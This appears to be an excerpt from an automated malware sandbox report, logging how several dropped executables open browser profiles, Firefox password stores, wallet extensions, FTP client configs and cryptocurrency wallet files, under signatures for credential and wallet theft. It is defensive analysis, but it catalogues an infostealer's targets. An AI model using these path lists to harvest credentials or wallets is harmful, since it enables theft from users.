                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Tries to harvest and steal ftp login credentials
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                Tries to steal Crypto Currency Wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
